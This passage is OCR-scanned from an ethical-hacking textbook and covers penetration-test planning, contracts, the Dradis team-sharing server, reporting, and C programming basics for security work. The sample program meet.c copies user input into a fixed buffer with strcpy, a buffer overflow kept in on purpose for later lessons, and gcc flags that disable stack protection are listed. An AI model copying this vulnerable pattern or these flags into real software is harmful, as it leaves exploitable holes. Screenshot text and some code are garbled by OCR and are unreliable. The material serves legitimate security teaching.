compromised host, someone has probably written a script to do it. If your Auto- 
RunScript need is not satisfied with any of the included scripts, you can easily modify 
one of the scripts or even write your own from scratch. 



References 

Metasploit Wiki www.metasploit.com/redmine/projects/framework/wiki 
Programming Ruby: The Pragmatic Programmer's Guide (D. Thomas, C. Fowler, 
and A. Hunt) ruby-doc.org/docs/ProgrammingRuby/ 



Going Further with Metasploit 

Pen-testers have been using and extending Metasploit since 2003. There's a lot more to 
it than can be covered in these few pages. The best next step after downloading and 
playing with Metasploit is to explore the excellent, free online course Metasploit Un- 
leashed. You'll find ways to use Metasploit in all phases of penetration testing. Meta- 
sploit includes host and vulnerability scanners, excellent social engineering tools, abil- 
ity to pivot from one compromised host into the entire network, extensive post-exploi- 
tation tactics, a myriad of ways to maintain access once you've got it, and ways to auto- 
mate everything you would want to automate. You can find this online course at www 
.offensive-security.com/metasploit-unleashed/. 

Rapid7, the company who owns Metasploit, also offers a commercial version of 
Metasploit called Metasploit Express (www.rapid7.com/products/metasploit-express/). 

It comes with a slick GUI, impressive brute-forcing capabilities, and customizable re- 
porting functionality. The annual cost of Metasploit Express is $3, 000/user. 
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CHAPTER 



Managing a 
Penetration Test 



In this chapter, we discuss managing a penetration test. We cover the following topics: 

• Planning a penetration test 

• Structuring a penetration testing agreement 

• Execution of a penetration test 

• Information sharing during a penetration test 

• Reporting the results of a penetration test 

When it comes to penetration testing, the old adage is true: plan your work, then 
work your plan. 

Planning a Penetration Test 

When planning a penetration test, you will want to take into consideration the type, 
scope, locations, organization, methodology, and phases of the test. 

Types of Penetration Tests 

There are basically three types of penetration testing: white box, black box, and 
gray box. 

White Box Testing 

White box testing is when the testing team has access to network diagrams, asset re- 
cords, and other useful information. This method is used when time is of the essence 
and when budgets are tight and the number of authorized hours is limited. This type of 
testing is the least realistic, in terms of what an attacker may do. 

Black Box Testing 

Black box testing is when there is absolutely no information given to the penetration 
testing team. In fact, using this method of testing, the penetration testing team may 
only be given the company name. Other times, they may be given an IP range and 
other parameters to limit the potential for collateral damage. This type of testing most 
accurately represents what an attacker may do and is the most realistic. 
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Gray Box Testing 

Gray box testing is, you guessed it, somewhere in between white box testing and black 
box testing. This is the best form of penetration testing where the penetration testing 
team is given limited information and only as required. So, as they work their way from 
the outside in, more access to information is granted to speed the process up. This 
method of testing maximizes realism while remaining budget friendly. 

Scope of a Penetration Test 

Scope is probably the most important issue when planning a penetration test. The test 
may vary greatly depending on whether the client wants all of their systems covered or 
only a portion of them. It is important to get a feel for the types of systems within scope 
to properly price out the effort. The following is a list of good questions to ask the client 
(particularly in a white box testing scenario): 

• What is the number of network devices that are in scope? 

• What types of network devices are in scope? 

• What are the known operating systems that are in scope? 

• What are the known websites that are in scope? 

• What is the length of the evaluation? 

• What locations are in scope? 

Locations of the Penetration Test 

Determining the locations in scope is critical to establishing the amount of travel and 
the level of effort involved for physical security testing, wireless war driving, and social 
engineering attacks. In some situations, it will not be practical to evaluate all sites, but 
you need to target the key locations. For example, where are the data centers and the 
bulk of users located ? 

Organization of the Penetration Testing Team 

The organization of the penetration testing team varies from job to job, but the follow- 
ing key positions should be filled (one person may fill more than one position): 

• Team leader 

• Physical security expert 

• Social engineering expert 

• Wireless security expert 

• Network security expert 

• Operating System expert 
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Methodologies and Standards 

There are several well-known penetration testing methodologies and standards. 

OWASP 

The Open Web Application Security Project (OWASP) has developed a widely used set 
of standards, resources, training material, and the famous OWASP Top 10 list, which 
provides the top ten web vulnerabilities and the methods to detect and prevent them. 

OSSTMM 

The Open Source Security Testing Methodology Manual (OSSTMM) is a widely used 
methodology that covers all aspects of performing an assessment. The purpose of the 
OSSTMM is to develop a standard that, if followed, will ensure a baseline of test to 
perform, regardless of customer environment or test provider. This standard is open 
and free to the public, as the name implies, but the latest version requires a fee for 
download. 

ISSAF 

The Information Systems Security Assessment Framework (ISSAF) is a more recent set 
of standards for penetration testing. The ISSAF is broken into domains and offers spe- 
cific evaluation and testing criteria for each domain. The purpose of the ISSAF is to 
provide real-life examples and feedback from the field. 

Phases of the Penetration Test 

It is helpful to break a penetration test into phases. For example, one way to do this is 
to have a three-phase operation: 

• I: External 

• II: Internal 

• III: Quality Assurance (QA) and Reporting 

Further, each of the phases may be broken down into subphases; for example: 

• I. a: Footprinting 

• I.b: Social Engineering 

• I.c: Port Scanning 

• II. a: Test the internal security capability 

• And so on. 

The phases should work from the outside to the inside of an organization, as shown 
in Figure 9-1. 
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Footprinting 
DMZ scans 
Social engineering 



Penetration Testing Plan 




Notice in Figure 9-1 phase II. a, Test Security Response. The purpose of this phase is 
to test the client's security operations team. If done properly and coordinated with the 
fewest amount of people possible, this phase is quite effective in determining the secu- 
rity posture of an organization. For example, it helps to determine whether or not the 
security team responds to network scans or deliberate attacks on the network. This 
phase can be done onsite or offsite with a VPN connection. This phase is normally 
short, and once the results are noted, the assessment moves on to the next phase, with 
or without the cooperation of the security operations team (depending on the type of 
assessment performed). 
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Testing Plan for a Penetration Test 

It is helpful to capture the plan and assignments on a spreadsheet. For example: 



Acme Pen Test Plan 7/1/2010 
















Start Date 


Time 


Joe 


Matt 


Alex 


Susan 


Bart 


Note 


Kirk Off Mppting 


1-Spp 




X 


X 


X 


X 


X 




Phase I 






X 








X 


Limited to 50 hours (each) here 


Footprinting 


2-Sep 




X 








X 




Test up VPN ronnprtivity 


1 fi-Spp 










X 






Arrive on Location 


16-Sep 


2000 


X 


X 


X 








Phase 11 






X 


X 


X 


X 




Limited to 100 hours (each) here 


Phasp II a 


TRO 
















Connect Remotely 


Day 1 


0830 














Start Deliberate Scans Slow 


Day 1 


0900 


X 


X 


X 


X 






Start Deliberate Scans Fast 


Day 1 


1300 


X 


X 


X 


X 






Start Deliberate Attacks 


Day 2 


0800 


X 


X 


X 


X 






Phase 11 b 


17-Sep 
















Setup in Conf Room, test net 


17-Sep 


0800 














Social Engineering Attacks 


17-Sep 


0800 


X 






X 




Thumbdrive drops, calls to help desk, etc 



A spreadsheet like this allows you to properly load balance the team and ensure that all 
elements of the phases are properly scheduled. 

References 

Penetration test http://en.wikipedia.org/wiki/Penetration_test 

Good list of tasks www.vulnerabilityassessment.co.uk/Penetration%20Test.html 

Structuring a Penetration Testing Agreement 

When performing penetration tests, the signed agreements you have in place may be 
your best friend or worst enemy. The following documents apply. 

Statement of Work 

Most organizations use a Statement of Work (SOW) when contracting outside work. 
The format of the SOW is not as important as its content. Normally, the contractor (in 
this case, the penetration tester) prepares the SOW and presents it to the client as part 
of the proposal. If the client accepts, the client issues a purchase order or task order on 
the existing contract. There are some things you want to ensure you have in the SOW: 

• Purpose of the assessment 

• Type of assessment 

• Scope of effort 

• Limitations and restrictions 

• Any systems explicitly out of scope 

• Time constraints of the assessment 

• Preliminary schedule 

• Communication strategy 

• Incident handling and response procedures 
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• Description of the task to be performed 

• Deliverables 

• Sensitive data handling procedures 

• Required manpower 

• Budget (to include expenses) 

• Payment terms 

• Points of contact for emergencies 

Get-Out-of-Jail-Free Letter 

Whenever possible, have the client give you a "get-out-of-jail-free letter." The letter 
should say something like 

To whom it may concern, 

Although this person looks like they are up to no good, they are actually part of a 
security assessment, authorized by The Director of Security. . . 

Please direct any questions to. . . 

A letter of this sort is particularly useful when crawling around dumpsters in the middle 
of the night. 

References 

NIST Technical Guide to Information Security Testing and Assessment (800-115; 
replaces 800-42) csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf 
OSSTMM www.isecom.org/osstmm/ 

Execution of a Penetration Test 

Okay, now that we have all the planning and paperwork in place, it is time to start sling- 
ing packets. . .well, almost. First, let's get some things straight with the client. 

Kickoff Meeting 

Unless a black box test is called for, it is important to schedule and attend a kickoff 
meeting, prior to engaging with the client. This is your opportunity not only to confirm 
your understanding of the client's needs and requirements but also to get off on the 
right foot with the client. 

It is helpful to remind the client of the purpose of the penetration test: to find as 
many problems in the allotted time as possible and make recommendations to fix 
them before the bad guys find them. This point cannot be overstated. It should be fol- 
lowed with an explanation that this is not a cat-and-mouse game with the system ad- 
ministrators and the security operations team. The worst thing that can happen is for a 
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system administrator to notice something strange in the middle of the night and start 
taking actions to shut down the team. Although the system administrator should be 
commended for their observation and desire to protect the systems, this is actually 
counterproductive to the penetration test, which they are paying good money for. 

The point is that, due to the time and money constraints of the assessment, the test- 
ing team will often take risks and move faster than an actual adversary. Again, the pur- 
pose is to find as many problems as possible. If there are 100 problems to be found, the 
client should desire that all of them be found. This will not happen if the team gets 
bogged down, hiding from the company employees. 



NOTE As previously mentioned, there may be a small phase of the 
penetration test during which secrecy is used to test the internal security 
response of the client. This is most effective when done at the beginning of the 
test. After that brief phase, the testing team should move as fast as possible to 
cover as much ground as possible. 

Access During the Penetration Test 

During the planning phase, you should develop a list of resources required from the cli- 
ent. As soon as possible after the kickoff meeting, you should receive those resources 
from the client. For example, you may require a conference room that has adequate room 
for the entire testing team and its equipment and that may be locked in the evenings with 
the equipment kept in place. Further, you may require network access. You might request 
two network jacks, one for the internal network, and the other for Internet access and 
research. You may need to obtain identification credentials to access the facilities. The 
team leader should work with the client point of contact to gain access as required. 

Managing Expectations 

Throughout the penetration test, there will be a rollercoaster of emotions (for both the 
penetration testing team and the client). If the lights flicker or a breaker blows in the 
data center, the penetration testing team will be blamed, ft is imperative that the team 
leader remain in constant communication with the client point of contact and manage 
expectations. Keep in mind this axiom: first impressions are often wrong. As the testing 
team discovers potential vulnerabilities, be careful about what is disclosed to the client, 
because it may be wrong. Remember to under-promise and overachieve. 

Managing Problems 

From time to time, problems will arise during the test. The team may accidentally cause 
an issue, or something outside the team's control may interfere with the assessment. At 
such times, the team leader must take control of the situation and work with the client 
point of contact to resolve the issue. There is another principle to keep in mind here: 
bad news does not get better with time. If the team broke something, it is better to dis- 
close it quickly and work to not let it happen again. 
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Steady Is Fast 

There is an old saying, "steady is fast." It certainly is true in penetration testing. When 
performing many tasks simultaneously, it will seem at times like you are stuck in quick- 
sand. In those moments, keep busy, steadily grinding through to completion. Try to 
avoid rushing to catch up; you will make mistakes and have to redo things. 

External and Internal Coordination 

Be sure to obtain client points of contact for questions you may have. For example, after 
a couple of days, it may be helpful to have the number of the network or firewall ad- 
ministrator on speed dial. During off hours, if the client point of contact has gone 
home, sending an e-mail or SMS message to them occasionally will go a long way to- 
ward keeping them informed of progress. On the other hand, coordination within the 
team is critical to avoid redundancy and to ensure that the team doesn't miss some- 
thing critical. Results should be shared across the team, in real time. 



Information Sharing During a Penetration Test 

Information sharing is the key to success when executing a penetration test. This is es- 
pecially true when working with teams that are geographically dispersed. The Dradis 
Server is the best way to collect and provide information sharing during a penetration 
test. In fact, it was designed for that purpose. 



Dradis Server 

The Dradis framework is an open source system for information sharing. It is particu- 
larly well suited for managing a penetration testing team. You can keep your team in- 
formed and in sync by using Dradis for all plans, findings, notes, and attachments. 
Dradis has the ability to import from other tools, like 

• Nmap 

• Nessus 

• Nikto 

• Burp Scanner 




NOTE The Dradis framework runs on Windows, Linux, Mac OS X, and other 
platforms. For this chapter, we will focus on the Windows version. 



Installing Dradis 

You can download the Dradis server from the Dradis website, http://dradisframework 
.org. After you download it onto Windows, execute the installation package, which will 
guide you through the installation. 



NOTE The Dradis installer will install all of the prerequisites needed, 
including Ruby and SQLite3. 
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S) dradis 2.5 Setup 




l~^~) a IS 

Welcome to the dradis 2.5 Setup 
Wizard 



This wizard wil guide you through the installation of dradis 
version 2.5 

Click next to continue. 



Starting Dradis 

You start the Dradis framework from the Windows Start menu. 



dradis 

dradis web interface 

i , dradisframework.org 

reset server (deletes db and attachm 
A start dradis server 
85 Uninstall ^ 



It takes a few moments for the Ruby Rails server to initialize. When the startup 
screen looks like the following, you are ready to use the server. 



A start dradis server 



a6:d7:b4:93:67:cc:0a:lf :8b:3b:63:a0:8S:ad:f 5:53:90:79: 
6e:8e:74:94:3c:22:9c:34:0a:e5:3c:5S:88:0e:la:68:dd:02: 

S0:lf :29:2b:12:S5:6b:99:69:ca:3d:f9:02:97:8b:Se:df :7c: 
80:dd:15:e0:4e:b3:e2:89:71:7d:e4:fa:f0:eb:d2:a3:15:8d: 
70:3d:84:13:e9:75:bf :7a:?0:7d:e5 :6d:9a:d2 :3c :0e :51 :c7: 
d0:d3 

[2010-02-23 09:48:17] INFO UEBrick: :HTTPSeruer#start : pid=5240 port =3004 

4 | w I ► 



Next, browse to 

http : //localhost : 3004 

After you get past the warnings concerning the invalid SSL certificate, you will be 
presented with a welcome screen, which contains useful information. 



Welcome Users and Passwords 



Community / Help 



to 



Interface 



Plugins 



Reporting 




What is Dradis? 

Dradis is an open source framework to enable effective information 
sharing. 

Dradis is a self-contained web application that provides a centralised 
repository of information to keep track of what has been done so far, 
and what is still ahead, (screenshots - demo] 
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User Accounts 

Although there are no actual user accounts in Dradis, users must provide a username 
when they log in, to track their efforts. A common password needs to be established 
upon the first use. 

Clicking the "back to the app" link at the top of the screen takes you to the Server 
Password screen. 







welcome to dradis 



Server password 



This server does not have a password yet. please set up one 
Password 



Confirm Password 



The common password is shared by all of the team members when logging in. 




Yes, it is against best practice to share passwords. 



Interface 

The user interface is fashioned after an e-mail client. There are folders on the left and 
notes on the right, with details below each note. 



dradis v 2.5.0 logout I feedback 



l import from f»e Q export * 




mkl In him ii ,2* i^j Dj n 


odd note 7] note categories * 2* 



*£9IMtiadokiw itxt - category Author Last upd 



d ‘_J T notpnntcg 

£3 Google Mocking 
3 MoUcgo 

a ^ Socal tnomeemg 
?|Pt»one 
Q USB Dropping 
^ P Slummy 
$1 Port ficannmg 
d '_J Vulnerabtties T oond 
£] Dcfou* Passwords 



=> Category: default category 

cal Die neoseek, attempt to g^n access to account and password information detsut category Joe It reb 2... 

Call the helpdesk, attempt to gam access to account and password information 
Notes Import note . . . Attachments 



The Dradis framework comes empty, ffowever, in a few minutes' time, you may add 
nodes and subnodes to include anything you like. For example, as just shown, you may 
add a node for your favorite methodology and a node for the vulnerabilities that you 
found. This allows you to use the system as a kind of checklist for your team as they 
work through the methodology. You may add notes for each node and upload attach- 
ments to record artifacts and evidence of the findings. 
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Export/Upload Plug-ins 

A very important capability of Dradis is the ability to export and import. You may ex- 
port reports in Word and HTML format. You may also export the entire database project 
or just the template (without notes or attachments). 



0 expert ' 




J Word export ► 


„ 


Project export k 


As template 


Html export 


Ful project \J 

Metaserver commit 



This allows you to pre-populate the framework on subsequent assessments with your 
favorite template. 

Import Plug-ins 

There are several import plug-ins available to parse and import external data: 

• WikiMedia wiki Used to import data from your own wiki 

• Vulnerability Database Used to import data from your own vulnerability 
database 

• OSVDB Used to import data from the Open Source Vulnerability Database 

In order to use the OSVDB import plug-in, you need to first register at the OSVDB 
website and obtain an API key. Next, you find and edit the osvdb_import.yml file in the 
following folder: 

C : \Users\<username goes here>\AppData\Roaming\dradis-2 . 5\server\conf ig> 



0 O ( 

Organize ' 



AppData 

L °p en 



Favorites 

Qy Recently Change 
Public 
H Desktop 
Jl Downloads 
Recent Places 

a Libraries 



Roaming ► dradis-2.5 ► server ► config ► 
Share with ▼ New folder 



^ \4f I Search config 



irni o i-dj 



3 6 



Name 

T5 environment.rb 

\ first_login.txt 

j nessus_uplood.yml 




Date modified 
2/5/2010 6:43 AM 
2/23/2010 9:50 AM 
11/20/2009 6:39 AM 


Type 

Ruby Program 
Text Document 
YML Hie 


Size 

4 KB 
1 KB 
1 KD 


] , nwHh_impnrt.yml 


K 


1/12/2010 9:14 AM 


YMI File 


1 KR | — 


i project_manaqement.yml 




11/25/2009 7:35 AM 


YML File 


1KB 


routes.rb 




10/29/2009 5:39 PM 


Ruby Program 


2 KB r 


vulndbjmport.yml 




1/12/2010 9:14 AM 


YML File 


1KB 


l_j wikijmport.yml 




11/20/2009 7:36 AM 


YML File 


1KB 



Inside that file, edit the API key line and place your key there: 

# Please register an account in the OSVDB site to get your API key. Steps: 

# 1. Create the account: http://osvdb.org/account/signup 

# 2. Find your key in http://osvdb.org/api 
API_key: <your_API_key> 
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Save the file and restart your Dradis server. Now, you should be able to import data 
from the OSVDB site. At the bottom of the Dradis screen, click the Import tab. Select 
the External Source of OSVDB. Select the Filter as General Search. Provide a Search For 
string and press enter. It will take the OSVDB database a few seconds to return the re- 
sults of the query. At this point, you can right-click the result you are interested in and 
import it. 



diadn »J. r i.O - Inoont | frfdharlt 

\ mport from We. Q export - 



0 004 wonen ivy L_: 


" External Source: 


0SVD8 In voit Pluyii (OSVDBInvu'L 2.4.0) 


V 


* i Methodology 
A f-j hoottnntriQ 


1 iter: 


GeneralSearrh: General Search 




- 


lUOOQle HBCKfflQ 


Search for: 


Default I’aKword 


C 1 uiteoo 

• Social Engineering 
CD Phone 


Results: 


Tttc 


Description 






He® ter km ware Uetaut Here«te 


fldaeaircatwn temapr vumeraoetv dioui/o-WSbttWciaaertication * 


Q USB Dropping 




Apple iPnone / Pod Touch Muupie 


«tcias»irca!»n_ten*i* vuinerac«y_a 1 07 2462W4487 1 2ct**irflcj0on 


Q) l> Scanning 
f~l Pu«l Stamwy 
s VirtwnnWiin* Fminri 




Dim*! Wrtit i>ijh: AiIiiwi Doionlr n 


#fiJ«v»iri Jtltin trim)# i 


lukiei ntiiHy_i1 1 07M7 1 iU4flO«K)i jawth-ritai , 




IIP Dpnrntinn.i Mnn/igrr n» wrhinr ^ 


erparttne Itom*]# . 


iijtnnratMMy_(11fl77A4Ari4Vi7nir.iA*!ufirjihnn 


1 1 rVrfmit Pn.vt winds 


Muir-. Import iKilr_ SlUEur I-. 


\ r 





Now, back on the Notes tab, you may modify the newly imported data as needed. 

?*ldescriptkmj?* 

Ry (Irfautl. Wrbl.ogjt: installs with a (Irfanll password Tlir ‘ wrtaloyr ' arniinil lias a passwind of ‘wrhlogic 
which is publicly known and documented. This allows attackers to tmialh r access the program or system. 

^[soliilitm]^ | = i 

Immediately after installation, change all default installed accounts to use a unique and secure password When 
possible, change default account names to custom names as well. 

“[complete]** 

70 



Team Updates 

The real magic of Dradis occurs when multiple users enter data at the same time. The 
data is synchronized on the server, and users are prompted to refresh their screens to get 
the latest data. Access may be granted to the client, enabling them to keep abreast of the 
current status at all times. Later, when the assessment is done, a copy of the framework 
database may be left with the client as part of the report. Goodbye, spreadsheets! 

References 

Dradis http : / / dradisframework. org 

OSVDB signup http://osvdb.org/account/signup 

Reporting the Results of a Penetration Test 

What good is a penetration test if the client cannot decipher the results? Although the 
reporting phase sometimes is seen as an afterthought, it is important to focus on this 
phase and produce a quality product for the client. 
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Format of the Report 

The format of the report may vary, but the following items should be present: 

• Table of contents 

• Executive summary 

• Methodology used 

• Prioritized findings per business unit, group, department 

• Finding 

• Impact 

• Recommendation 

• Detailed records and screenshots in the appendix (back of report) 

Presenting the findings in a prioritized manner is recommended. It is true that not 
all vulnerabilities are created equal. Some need to be fixed immediately, whereas others 
can wait. A good approach for prioritizing is to use the likelihood of remote adminis- 
trative compromise. Critical findings may lead to remote administrative compromise 
(today) and should be fixed immediately. High findings are important but have some 
level of mitigation factor involved to reduce the risk to direct compromise. For example, 
perhaps the system is behind an internal firewall and only accessible from a particular 
network segment. High findings may need to be fixed within six months. Medium find- 
ings are less important and should be fixed within one year. Low findings are informa- 
tional and may not be fixed at all. The recommended timelines may vary from tester to 
tester, but the priorities should be presented; otherwise, the client may be overwhelmed 
with the work to be performed and not do anything. 

Presenting the findings grouped by business unit, group, or division is also recom- 
mended. This allows the report to be split up and handed to the relevant groups, keep- 
ing the sensitive information inside that group. 

Out Brief of the Report 

The out brief is a formal meeting to present a summary of the findings, trends, and 
recommendations for improvement. It is helpful to discover how the client is orga- 
nized. Then, the out brief may be customized per business unit, group, or department. 
It may be helpful to deliver the findings to each group, separately. This reduces the 
natural tendency of defensiveness when issues are discussed among peers groups. If 
there is more than a week between the commencement of the penetration test and the 
actual out brief, a quick summary of critical findings, trends, and recommendations for 
improvement should be provided at the end of the assessment. This will allow the cli- 
ent to begin correcting issues prior to the formal out brief. 
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CHAPTER 



Programming 
Survival Skills 



Why study programming? Ethical gray hat hackers should study programming and 
learn as much about the subject as possible in order to find vulnerabilities in programs 
and get them fixed before unethical hackers take advantage of them. It is very much a 
foot race: if the vulnerability exists, who will find it first? The purpose of this chapter is 
to give you the survival skills necessary to understand upcoming chapters and later find 
the holes in software before the black hats do. 

In this chapter, we cover the following topics: 

• C programming language 

• Computer memory 

• Intel processors 

• Assembly language basics 

• Debugging with gdb 

• Python survival skills 

C Programming Language 

The C programming language was developed in 1972 by Dennis Ritchie from AT&T 
Bell Labs. The language was heavily used in Unix and is thereby ubiquitous. In fact, 
much of the staple networking programs and operating systems are based in C. 

Basic C Language Constructs 

Although each C program is unique, there are common structures that can be found in 
most programs. We'll discuss these in the next few sections. 

main() 

All C programs contain a main() structure (lowercase) that follows this format: 

Coptional return value type> main (Coptional argument>) { 

Coptional procedure statements or function calls>; 

} 
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where both the return value type and arguments are optional. If you use command-line 
arguments for main(), use the format 

Coptional return value type> main(int argc, char * argv[]){ 

where the argc integer holds the number of arguments and the argv array holds the input 
arguments (strings). The parentheses and brackets are mandatory, but white space be- 
tween these elements does not matter. The brackets are used to denote the beginning and 
end of a block of code. Although procedure and function calls are optional, the program 
would do nothing without them. Procedure statements are simply a series of commands 
that perform operations on data or variables and normally end with a semicolon. 

Functions 

Functions are self-contained bundles of algorithms that can be called for execution by 
main() or other functions. Technically, the main() structure of each C program is also 
a function; however, most programs contain other functions. The format is as follows: 

<optional return value type> function name (Coptional function argument>) { 

} 



The first line of a function is called the signature. By looking at it, you can tell if the 
function returns a value after executing or requires arguments that will be used in pro- 
cessing the procedures of the function. 

The call to the function looks like this: 

Coptional variable to store the returned value =>function name (arguments 
if called for by the function signature) ; 

Again, notice the required semicolon at the end of the function call. In general, the 
semicolon is used on all stand-alone command lines (not bounded by brackets or 
parentheses). 

Functions are used to modify the flow of a program. When a call to a function is 
made, the execution of the program temporarily jumps to the function. After execution 
of the called function has completed, the program continues executing on the line fol- 
lowing the call. This will make more sense during our discussion in Chapter 11 of stack 
operation. 

Variables 

Variables are used in programs to store pieces of information that may change and may 
be used to dynamically influence the program. Table 10-1 shows some common types 
of variables. 

When the program is compiled, most variables are preallocated memory of a fixed 
size according to system-specific definitions of size. Sizes in the table are considered 
typical; there is no guarantee that you will get those exact sizes. It is left up to the hard- 
ware implementation to define this size. However, the function sizeof() is used in C to 
ensure that the correct sizes are allocated by the compiler. 
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Variable Type 


Use 


Typical Size 


int 


Stores signed integer values such as 
3 14 or -3 14 


4 bytes for 32-bit machines 
2 bytes for 16-bit machines 


float 


Stores signed floating-point numbers such 
as -3.234 


4 bytes 


double 


Stores large floating-point numbers 


8 bytes 


char 


Stores a single character such as “d” 


1 byte 


Table 10-1 Types 


ofVariables 





Variables are typically defined near the top of a block of code. As the compiler 
chews up the code and builds a symbol table, it must be aware of a variable before it is 
used in the code later. This formal declaration of variables is done in the following 
manner: 

Cvariable type> Cvariable name> Coptional initialization starting with 

For example: 

int a = 0; 

where an integer (normally 4 bytes) is declared in memory with a name of a and an 
initial value of 0. 

Once declared, the assignment construct is used to change the value of a variable. 
For example, the statement 

x=x+l; 

is an assignment statement containing a variable x modified by the + operator. The new 
value is stored into x. It is common to use the format 

destination = source <with optional operators> 

where destination is the location in which the final outcome is stored. 

printf 

The C language comes with many useful constructs for free (bundled in the libc li- 
brary). One of the most commonly used constructs is the printf command, generally 
used to print output to the screen. There are two forms of the printf command: 

printf (<string>) ; 

printf (<format string>, clist of variables/values>) ; 

The first format is straightforward and is used to display a simple string to the 
screen. The second format allows for more flexibility through the use of a format string 
that can be composed of normal characters and special symbols that act as placeholders 
for the fist of variables following the comma. Commonly used format symbols are 
listed and described in Table 10-2. 
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Table 10-2 


Format Symbol 


Meaning 


Example 


printf Format 
Symbols 


\n 


Carriage return/new 
line 


printf(“test\n”); 



%d 


Decimal value 


printff'test %d”, 123); 


%s 


String value 


printff'test %s”,“ 1 23”); 


%x 


Hex value 


printf(“test %x”, Ox 1 23); 



These format symbols may be combined in any order to produce the desired out- 
put. Except for the \n symbol, the number of variables/values needs to match the num- 
ber of symbols in the format string; otherwise, problems will arise, as described in 
Chapter 12. 

scanf 

The scanf command complements the printf command and is generally used to get 
input from the user. The format is as follows: 

scanf (<format string>, clist of variables/values>) ; 

where the format string can contain format symbols such as those shown for printf in 
Table 10-2. For example, the following code will read an integer from the user and store 
it into the variable called number: 

scanf ("%d", Snumber) ; 

Actually, the & symbol means we are storing the value into the memory location 
pointed to by number; that will make more sense when we talk about pointers later in 
the chapter in the "Pointers" section. For now, realize that you must use the & symbol 
before any variable name with scanf. The command is smart enough to change types 
on-the-fly, so if you were to enter a character in the previous command prompt, the 
command would convert the character into the decimal (ASCII) value automatically. 
However, bounds checking is not done in regard to string size, which may lead to prob- 
lems (as discussed later in Chapter 11). 

strcpy/strncpy 

The strcpy command is probably the most dangerous command used in C. The format 
of the command is 

strcpy (<destination>, <source>) ; 

The purpose of the command is to copy each character in the source string (a series 
of characters ending with a null character: \0) into the destination string. This is par- 
ticularly dangerous because there is no checking of the size of the source before it is 
copied over the destination. In reality, we are talking about overwriting memory loca- 
tions here, something which will be explained later in this chapter. Suffice it to say, 
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when the source is larger than the space allocated for the destination, bad things hap- 
pen (buffer overflows). A much safer command is the strncpy command. The format of 
that command is 

strncpy (<destination>, <source>, <width>) ; 

The width field is used to ensure that only a certain number of characters are copied 
from the source string to the destination string, allowing for greater control by the pro- 
grammer. 



✓ 



for and while Loops 

Loops are used in programming languages to iterate through a series of commands 
multiple times. The two common types are for and while loops. 

for loops start counting at a beginning value, test the value for some condition, 
execute the statement, and increment the value for the next iteration. The format is as 
follows: 

for (<beginning value>; <test value>; <change value>) { 

<statement>; 

} 



NOTE It is unsafe to use unbounded functions like strcpy; however, most 
programming courses do not cover the dangers posed by these functions. In 
fact, if programmers would simply use the safer alternatives — for example, 
strncpy — then the entire class of buffer overflow attacks would be less 
prevalent. Obviously, programmers continue to use these dangerous functions 
since buffer overflows are the most common attack vector. That said, even 
bounded functions can suffer from incorrect calculations of the width. 



Therefore, a for loop like 

for ( i=0 ; i<10; i++) { 
printf ("%d", i) ; 

} 

will print the numbers 0 to 9 on the same line (since \n is not used), like this: 
0123456789. 

With for loops, the condition is checked prior to the iteration of the statements in 
the loop, so it is possible that even the first iteration will not be executed. When the 
condition is not met, the flow of the program continues after the loop. 




NOTE It is important to note the use of the less-than operator (<) in place 
of the less-than-or-equal-to operator (<=), which allows the loop to proceed 
one more time until i= I O.This is an important concept that can lead to 
off-by-one errors. Also, note the count was started with O.This is common 
in C and worth getting used to. 
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The while loop is used to iterate through a series of statements until a condition is 
met. The format is as follows: 

while (<conditional test>) { 

<statement>; 

} 



It is important to realize that loops may be nested within each other. 

if/else 

The if/else construct is used to execute a series of statements if a certain condition is 
met; otherwise, the optional else block of statements is executed. If there is no else 
block of statements, the flow of the program will continue after the end of the closing 
if block bracket (}). The format is as follows: 

if (<condition>) { 

<statements to execute if condition is met> 

} <else>{ 

<statements to execute if the condition above is false>; 

} 



The braces may be omitted for single statements. 

Comments 

To assist in the readability and sharing of source code, programmers include comments 
in the code. There are two ways to place comments in code: //, or /* and */. The // in- 
dicates that any characters on the rest of that line are to be treated as comments and not 
acted on by the computer when the program executes. The /* and */ pair starts and 
stops a block of comments that may span multiple lines. The /* is used to start the com- 
ment, and the */ is used to indicate the end of the comment block. 



Sample Program 

You are now ready to review your first program. We will start by showing the program 
with // comments included, and will follow up with a discussion of the program: 

//hello. c //customary comment of program name 

#include <stdio.h> //needed for screen printing 

main ( ) { //required main function 

printf ( "Hello haxor" ) ; //simply say hello 
} //exit program 

This is a very simple program that prints out "Hello haxor" to the screen using the 
printf function, included in the stdio.h library. 

Now for one that's a little more complex: 



//meet . c 

#include <stdio.h> // needed for screen printing 

greeting (char *templ,char *temp2) { // greeting function to say hello 
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char name [400]; // string variable to hold the name 

strcpy(name, temp2) ; // copy the function argument to name 

printf ( "Hello %s %s\n", tempi, name); //print out the greeting 

} 

main(int argc, char * argv[]){ //note the format for arguments 

greeting (argv [ 1 ] , argv[2]); //call function, pass title & name 

printf ("Bye %s %s\n", argv[l], argv[2]); //say "bye" 

} //exit program 



This program takes two command-line arguments and calls the greeting() func- 
tion, which prints "Hello" and the name given and a carriage return. When the greet- 
ing() function finishes, control is returned to main(), which prints out "Bye" and the 
name given. Finally, the program exits. 

Compiling with gcc 

Compiling is the process of turning human-readable source code into machine-readable 
binary files that can be digested by the computer and executed. More specifically, a com- 
piler takes source code and translates it into an intermediate set of files called object code. 
These files are nearly ready to execute but may contain unresolved references to symbols 
and functions not included in the original source code file. These symbols and refer- 
ences are resolved through a process called linking, as each object file is linked together 
into an executable binary file. We have simplified the process for you here. 

When programming with C on Unix systems, the compiler of choice is GNU C 
Compiler (gcc). gcc offers plenty of options when compiling. The most commonly 
used flags are listed and described in Table 10-3. 



Option 


Description 


-o <filename> 


Saves the compiled binary with this name. The default is to 
save the output as a.out. 


-S 


Produces a file containing assembly instructions; saved with 
a .s extension. 


-ggdb 


Produces extra debugging information; useful when using 
GNU debugger (gdb). 


-c 


Compiles without linking; produces object files with a .0 
extension. 


-mpreferred-stack-boundary=2 


Compiles the program using a DWORD size stack, simplifying 
the debugging process while you learn. 


-fno-stack-protector 


Disables the stack protection; introduced with GCC 4. 1 .This 
is a useful option when learning buffer overflows, such as in 
Chapter 1 1. 


-z execstack 


Enables an executable stack, which was disabled by default 
in GCC 4.1. This is a useful option when learning buffer 
overflows, such as in Chapter 1 1 . 



Table 10-3 Commonly Used gcc Flags 
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For example, to compile our meet.c program, you would type 

$gcc -o meet meet.c 

Then, to execute the new program, you would type 

$ . /meet Mr Haxor 
Hello Mr Haxor 
Bye Mr Haxor 
$ 



References 



Programming Methodology in C (Hugh Anderson) 
Teachings tuff/ cs 1101 c. pdf 
